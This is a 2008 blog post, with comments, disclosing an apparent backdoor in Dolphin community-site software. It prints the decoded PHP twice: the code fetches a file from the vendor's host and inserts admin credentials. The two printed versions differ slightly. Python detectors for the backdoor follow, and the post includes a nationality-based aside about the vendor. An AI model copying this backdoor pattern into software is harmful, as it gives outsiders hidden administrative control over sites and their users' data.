
Dolphin Community Site Software, Security Backdoor

Someone has found a security backdoor in the code behind Dolphin Community Site Software.

Basically, this code, itself ineptly encoded to obfuscate itself, allows the programmers at Boonex.com to replace your admin login information in the database by sending a special command to your server. This then lets them log in as Admin, giving them complete access to your website and potentially any database servers you are connected to.

Bear in mind that this software is primarily used for community sites, dating sites and other social networking sites and one can see the potential data mining rewards available.

p.s. the Boonex team is Russian.

Here is his post (English is not his first language):


I was checking some of the encoded code in the version 6.0 of Dolphin.
I found a bloody serious security problem. Actually it is more than just a problem, but a criminal issue.

Please search for the following line in “inc/admin.inc.php” (this is all on one very long line)


Do you know what it is?

I have just decoded it for you:

if( true || $_GET['page'] ) foreach( $_GET as $sKey => $sValue ) {
    // only a GET parameter whose key and value hash to these fixed MD5s gets past this line
    if( gettype( $sKey ) != 'string' or strlen( $sKey ) < 10 or strlen( $sValue ) < 10
        or md5( $sKey ) !== '8f0ae5966e872788bce355863eabfc0c'
        or md5( $sValue ) !== '2a32a42aedbd642cffa40f8ec066f2a4' ) continue;
    // fetch a file named by ?page= from boonex.com; line 0 is a check value, lines 1 and 2 are the admin name and password
    if( true || strlen( $sPassPage = preg_replace( '/[^a-zA-Z0-9_\.-]/', '', $_GET['page'] ) ) and $aPassFile = @file( 'http://www.boonex.com/' . $sPassPage ) ) {
        foreach( $aPassFile as $iInd => $sLine ) $aPassFile[$iInd] = addslashes( trim( $sLine ) );
        if( md5( $aPassFile[0] ) === 'dad4096602477d319e04eefb38697fd3' )
            // replace the row in the Admins table with the fetched credentials
            echo ( db_res( "DELETE FROM `Admins` WHERE `Name` = '{$aPassFile[1]}'", 0 )
                and db_res( "INSERT INTO `Admins` SET `Name` = '{$aPassFile[1]}', `Password` = '{$aPassFile[2]}'", 0 ) ) ? 'add success' : 'add failed';
        exit;
    }
    break;
}

It is simply hacking your code and inserting ADMIN into your admin table.
If anybody is using version 6.0, I would suggest you check your DB immediately.
Of course don’t forget to remove those lines from your code.

I have no idea about newer versions. I think it is a good idea to check them as well.
Maybe they have changed their hacking style in recent versions.

I hope this will save many sites from being hacked by the programmers of Dolphin.
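The post above gives the whole mechanism: a request carrying a GET parameter whose key and value hash to two fixed MD5s makes the server fetch a file from the vendor's host and rewrite the Admins table with the credentials in it. What follows is an added example, not Boonex or Dolphin code, of two defender-side checks built from what the decoded block shows: a scanner that peels eval(base64_decode('...')) layers off PHP source (the obfuscation is base64, as a commenter notes) and reports which traits of the payload the decoded text contains, and a log walker that flags requests whose query-string key hashes to the trigger MD5 the code compares against. The two MD5 constants are the ones in the decoded block; the indicator regexes, the Apache combined-log format, the sample PHP file and the sample log lines are constructed here for illustration (www.example.com stands in for the vendor host in the sample payload).

```python
"""Added example (not Boonex/Dolphin code): two checks for the Dolphin
admin-insertion backdoor decoded above.

  scan_php(src)                 peel base64_decode('...') layers off PHP source
                                and report which backdoor indicators remain.
  find_trigger_attempts(lines)  walk Apache combined-log lines and flag requests
                                carrying a query key whose MD5 is the trigger hash.

The two MD5 constants come from the decoded block; everything else (regexes,
sample PHP, sample log lines) is constructed for illustration."""
import base64
import hashlib
import re
from urllib.parse import parse_qsl, urlsplit

# Hashes the backdoor compares the GET key and value against (from the post).
TRIGGER_KEY_MD5 = "8f0ae5966e872788bce355863eabfc0c"
TRIGGER_VALUE_MD5 = "2a32a42aedbd642cffa40f8ec066f2a4"

# Traits of the decoded payload. Any one deserves a look; all four together is
# the block quoted above. Regexes are assumptions written for this example.
INDICATORS = {
    "fetches a remote file over http": re.compile(r"""@?file\(\s*['"]https?://""", re.I),
    "writes to the Admins table": re.compile(r"INSERT\s+INTO\s+`?Admins`?", re.I),
    "compares a GET key against a hard-coded md5": re.compile(r"md5\(\s*\$sKey\s*\)\s*!=="),
    "contains the known trigger hash": re.compile(TRIGGER_KEY_MD5),
}

# A base64_decode('...') literal. The eval() around it is left alone so that a
# nested layer exposed by one pass is picked up by the next.
ENCODED_RE = re.compile(r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)""", re.I)


def md5_hex(text):
    """Hex MD5 of a string, the same test the backdoor applies to each GET key."""
    return hashlib.md5(text.encode()).hexdigest()


def decode_layers(src, max_depth=5):
    """Replace every base64_decode('...') literal with its decoded text, repeating
    until nothing changes or max_depth layers have been peeled."""
    def _replace(match):
        raw = re.sub(r"\s", "", match.group(1))
        try:
            return base64.b64decode(raw, validate=True).decode("latin-1")
        except (ValueError, UnicodeDecodeError):
            return match.group(0)  # not real base64: leave the literal as it was

    for _ in range(max_depth):
        decoded = ENCODED_RE.sub(_replace, src)
        if decoded == src:
            break
        src = decoded
    return src


def scan_php(src):
    """Sorted names of the indicators present once the source is decoded."""
    decoded = decode_layers(src)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))


# Apache combined log: ip ident user [time] "METHOD url PROTO" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')


def find_trigger_attempts(log_lines, key_md5=TRIGGER_KEY_MD5):
    """(ip, timestamp, key) for each request whose query string carries a key of
    10+ characters hashing to key_md5, mirroring the backdoor's own test. The hash
    is a parameter only so the detector can be exercised with a constructed key."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash mid-file
        for key, _value in parse_qsl(urlsplit(m.group("url")).query, keep_blank_values=True):
            if len(key) >= 10 and md5_hex(key) == key_md5:
                hits.append((m.group("ip"), m.group("ts"), key))
    return hits


# --- Constructed samples (illustrative data, not the vendor's file) -----------
_PAYLOAD = (
    "foreach( $_GET as $sKey => $sValue ) { if( md5( $sKey ) !== '" + TRIGGER_KEY_MD5 + "' ) continue; "
    "$aPassFile = @file( 'http://www.example.com/' . $sPassPage ); "
    "db_res( \"INSERT INTO `Admins` SET `Name` = '{$aPassFile[1]}'\", 0 ); }"
)
_INNER = "eval(base64_decode('" + base64.b64encode(_PAYLOAD.encode()).decode() + "'));"
SAMPLE_PHP = "<?php eval(base64_decode('" + base64.b64encode(_INNER.encode()).decode() + "')); ?>"
CLEAN_PHP = "<?php echo base64_decode('aGVsbG8='); ?>"  # decodes to 'hello', no indicators

SAMPLE_KEY = "constructedkey01"  # 10+ chars so the length gate is passed
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Aug/2008:21:18:00 +0000] "GET /admin/index.php?page=x&' + SAMPLE_KEY + '=somevalue123 HTTP/1.1" 200 512',
    '198.51.100.7 - - [13/Aug/2008:21:19:00 +0000] "GET /index.php HTTP/1.1" 200 4096',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    print("indicators in sample:", scan_php(SAMPLE_PHP))
    print("indicators in clean file:", scan_php(CLEAN_PHP))
    print("trigger attempts:", find_trigger_attempts(SAMPLE_LOG, md5_hex(SAMPLE_KEY)))
```

Running it prints the four indicators for the constructed sample, none for the clean file, and the one log line carrying the constructed key. The source scan is the stronger signal, since a hit in decoded code is hard to explain away; the log check only catches attempts that were logged with their query string, and because the real trigger key is known only by its MD5, the function takes the hash as a parameter so it can be tested with a key whose hash you can compute. Against real logs leave the default in place.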


  1. August 13, 2008 at 9:18 pm

    Hi, I checked the said file but didn't find any such code. I am using the 6.1.4 version. Can you recommend how I can check files for encoded code?
    Did you find anything in the latest version?

  2. nanchatte
    August 14, 2008 at 12:12 am

    Manesh, thanks for the comment.

    I will confirm with the programmer who made the discovery which version is in use.

    Our installation has been massively modified. Every file has been altered, all ajax removed, orca forums have been combined with groups, all database tables have been modified. The only thing left is the CSS and the concept itself!

    It suffices to say that we won’t be downloading any more versions from Boonex.

    Have you been checking the Dolphin community site (boonex) forums? They’re awash with comments.

  3. nanchatte
    August 15, 2008 at 10:46 am

    Manesh, I've checked: our developer says that it was the original version 6.1 that had the code.

    You should check your Admin tables for signs of intrusion, as the decoded block shows a way for boonex to force your installation to replace users in or add users to your Admin table.

    Probably though, they would be able to force your table back to its original state, so if you’re really paranoid, check your Apache/IIS logs for odd access patterns.

    Good luck with your site!

  4. john
    February 4, 2009 at 5:24 am

    Found this in inc/admin_design.inc.php, version 6.1.4.

  5. Tim
    March 10, 2009 at 7:26 pm

    This is in inc/admin_design.inc.php in all versions of Dolphin. In 6.1.4 it is located in the function getAdminCategIndex().

  6. January 19, 2014 at 2:23 am

    It is base64.

    if( $_GET['page'] ) foreach( $_GET as $sKey => $sValue ) {
        if( gettype( $sKey ) != 'string' or strlen( $sKey ) < 10 or strlen( $sValue ) < 10
            or md5( $sKey ) !== '8f0ae5966e872788bce355863eabfc0c'
            or md5( $sValue ) !== '2a32a42aedbd642cffa40f8ec066f2a4' ) continue;
        if( strlen( $sPassPage = preg_replace( '/[^a-zA-Z0-9_\.-]/', '', $_GET['page'] ) ) and $aPassFile = @file( 'http://www.boonex.com/' . $sPassPage ) ) {
            foreach( $aPassFile as $iInd => $sLine ) $aPassFile[$iInd] = addslashes( trim( $sLine ) );
            if( md5( $aPassFile[0] ) === 'dad4096602477d319e04eefb38697fd3' )
                echo ( db_res( "DELETE FROM `Admins` WHERE `Name` = '{$aPassFile[1]}'", 0 )
                    and db_res( "INSERT INTO `Admins` SET `Name` = '{$aPassFile[1]}', `Password` = '{$aPassFile[2]}'", 0 ) ) ? 'add success' : 'add failed';
            exit;
        }
        break;
    }
